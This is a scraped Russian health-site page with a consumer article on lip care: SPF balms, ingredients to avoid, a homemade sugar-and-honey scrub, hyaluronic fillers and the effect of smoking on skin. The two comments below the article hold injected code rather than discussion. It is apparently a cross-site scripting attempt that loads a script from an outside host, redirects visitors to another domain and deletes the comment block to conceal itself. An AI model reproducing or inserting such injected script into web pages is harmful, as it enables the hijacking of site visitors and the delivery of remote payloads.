Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Секрет самых красивых губ  >>  Секрет самых красивых губ
 
Обратная связь
 

Секрет самых красивых губ

Размер шрифта
14 февраля 2014 00:00
  • google_analytics: false
  • Нравится

Красивые, мягкие губы – мечта многих женщин. Вы видите восхитительные губы на обложках журналов, в рекламе помады или у вашей любимой актрисы (да-да, сейчас мы говорим именно об Анджелине Джоли). Поверьте, ваши губы ничуть не хуже! Несколько советов помогут увеличить объем ваших губ и защитить их.

Секрет самых красивых губ

1. Правильно выбирайте средства для губ

Ваши губы часто и быстро становятся сухими? Прочтите этикетку вашего бальзама для губ. Американская академия дерматологии рекомендует отдавать предпочтение бальзамам для губ с SPF 30 или выше.

«Откажитесь от средств, в состав которых входят парабены или ароматические отдушки, они могут вызывать раздражение», – говорят дерматологи. Если ваши губы склонны к обветриванию, исключите также косметические средства, в состав которых входит камфара и ментол, отдавая предпочтения компонентам, которые поддерживают полноценное увлажнение. К ним относится глицерин, минеральное масло, алоэ, молочная кислота и сорбитол. А ланолин и пчелиный воск мгновенно смягчат ваши губы.

2. Удалите огрубевшую кожу

Как правило, когда мы пользуемся отшелушивающими средствами для лица и тела, мы не задумываемся о том, что для губ такая процедура тоже была бы не лишней. Приготовьте собственный домашний скраб, используя сахар и мед, небольшими мягкими круговыми движениями втирайте его в губы. Удаление старых клеток эпидермиса стимулирует образование коллагена, который предотвращает появление морщин. После использования такого скраба промокните губы влажной салфеткой и нанесите бальзам для губ.   

3. Увеличьте объем

Пухлые губы смотрятся сексуально. Для достижения долгосрочного эффекта объема губ вы можете обратиться к дерматологу. Существует множество возможностей увеличить объем губ при помощи различных наполнителей на основе гиалуроновой кислоты в амбулаторных условиях. Дерматологи также используют комбинированную терапию – наполнители и ботокс – для более естественного вида и омоложения губ.  

4. Не курите

Исследования показали о связи курения и преждевременного старения кожи. Курение ускоряет повреждение клеток кожи и увеличивает потерю коллагена, что приводит к образованию морщин на всей коже, и губах в частности. Вместо сигареты сделайте собственный скраб.

Все секреты красоты вы можете узнать на страницах нашего специального проекта «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Гидроксиапатит кальция – революция в косметике? Или очередной обман?   Почему у вас сохнут губы   Как кофе сделает вас красивее!   Что сделать с бровями, чтобы казаться молодой  

Слайдшоу

1
Нужна ли вам пластическая операция?
Как сделать кожу красивой без кремов?
Как сэкономить на косметике с помощью зубной щетки?

Тесты

Как быстро вы стареете
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.